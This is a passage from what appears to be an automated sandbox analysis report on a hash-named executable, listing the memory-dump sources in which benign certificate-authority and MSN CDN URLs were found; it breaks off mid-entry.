Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.450013295.0000000004498000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.379088320.00000000059C8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: d.3.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.534169378.0000000004350000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344677569.0000000004640000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344525230.00000000045C8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349448406.00000000045C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347640015.0000000004647000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349340871.0000000004649000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347603038.0000000004645000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.494535680.0000000003F71000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.476014082.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351442378.00000000060B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.pki.goog/g
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351442378.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.534169378.0000000004350000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344677569.0000000004640000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351258305.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344525230.00000000045C8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351574992.00000000043C8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349448406.00000000045C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351358120.0000000006061000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.376499389.0000000004648000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347640015.0000000004647000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349340871.0000000004649000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351338476.0000000006059000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381221387.0000000006060000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351426457.0000000006091000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347603038.0000000004645000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351521194.0000000006090000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351295568.0000000006031000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.494535680.0000000003F71000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.476014082.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351574992.00000000043C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1c
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351258305.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351358120.0000000006061000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351338476.0000000006059000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381221387.0000000006060000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351426457.0000000006091000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351129238.0000000004649000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351411276.00000000060B1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351295568.0000000006031000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.315338055.0000000004620000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349965840.00000000059C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.315319449.0000000004600000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349943307.00000000057A9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349918817.0000000005789000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.450013295.0000000004498000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: http://ocsp2.globalsign.com/cloudsslsha2g30V
Source: d.3.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351129238.0000000004649000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351295568.0000000006031000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351258305.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351358120.0000000006061000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.534169378.0000000004350000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344677569.0000000004640000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344525230.00000000045C8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349448406.00000000045C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347640015.0000000004647000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349340871.0000000004649000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347603038.0000000004645000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.494535680.0000000003F71000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.476014082.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.315338055.0000000004620000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349965840.00000000059C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.315319449.0000000004600000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349943307.00000000057A9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349918817.0000000005789000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.450013295.0000000004498000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: http://secure.globalsign.com/cacert/cloudsslsha2g3.crt06
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.308045919.0000000004490000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.341605504.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.345656135.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.535092916.0000000004340000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347289821.0000000005508000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307906562.0000000004490000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.321512600.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349284500.0000000005509000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347277728.0000000005507000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.496538346.0000000003F50000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404777527.0000000004118000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.388648532.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.477148014.00000000040A0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.341605504.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.345656135.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.535092916.0000000004340000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314267282.00000000044E9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347289821.0000000005508000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349191582.0000000005669000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307906562.0000000004490000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347277728.0000000005507000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.428971263.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.449104366.0000000004431000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.536721197.0000000004341000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307960313.0000000004491000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.499822636.0000000004261000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404777527.0000000004118000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.389516118.00000000041E1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.388648532.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.403791587.0000000004301000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.477148014.00000000040A0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.308045919.0000000004490000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.543009095.0000000004477000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314974357.0000000004478000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.532592912.000000000419F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.341605504.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.345656135.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.535092916.0000000004340000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.529232605.0000000004200000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307906562.0000000004490000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.321512600.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349251067.0000000005549000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347086370.0000000005547000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350812643.0000000005F89000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.496538346.0000000003F50000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.493957688.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.388648532.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.393178760.000000000438F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.386871070.0000000004140000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.391643577.000000000438F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.477148014.00000000040A0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.403712972.0000000004328000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307792118.0000000004470000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.313164184.0000000004460000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.495660297.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.391263400.0000000004107000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.477412325.0000000004080000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
Source: d.3.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
Source: d.3.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.530316046.00000000041A1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.529232605.0000000004200000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.306227745.0000000004311000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350812643.0000000005F89000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314015208.0000000004479000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.434341392.0000000004311000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.403560063.0000000004329000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.391643577.000000000438F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.488369799.0000000003FE1000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.433380405.0000000004428000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.438159484.0000000004428000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.309693330.00000000043B7000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.529060873.000000000419F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.541938314.0000000004457000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.532721999.0000000004231000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.532677562.000000000422F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.532700118.0000000004230000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.310062566.00000000043B7000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.532744009.0000000004237000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.391617125.0000000004368000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.387883924.000000000412E000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500167271.0000000004208000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.393648613.0000000004368000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.403791587.0000000004301000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.395567700.0000000004369000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.395593036.000000000436F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.493863491.0000000003F87000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.530316046.00000000041A1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.529232605.0000000004200000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.306227745.0000000004311000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350812643.0000000005F89000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314015208.0000000004479000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.434341392.0000000004311000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.403560063.0000000004329000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.391643577.000000000438F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.488369799.0000000003FE1000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: d.3.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314775552.0000000004458000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.530316046.00000000041A1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.341605504.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.345656135.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.535092916.0000000004340000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314267282.00000000044E9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347289821.0000000005508000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349191582.0000000005669000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.529232605.0000000004200000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307906562.0000000004490000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349284500.0000000005509000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347277728.0000000005507000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350851224.0000000005F69000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.428971263.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.306227745.0000000004311000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314015208.0000000004479000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.449104366.0000000004431000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.434341392.0000000004311000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.536721197.0000000004341000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307960313.0000000004491000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.499822636.0000000004261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.341605504.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.345656135.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.535092916.0000000004340000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314267282.00000000044E9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349191582.0000000005669000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307906562.0000000004490000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349251067.0000000005549000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347086370.0000000005547000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.428971263.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.449104366.0000000004431000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.536721197.0000000004341000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307960313.0000000004491000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.499822636.0000000004261000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.389516118.00000000041E1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.388648532.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.403791587.0000000004301000.00000004.00000800.00020000.00000000.sdmp, 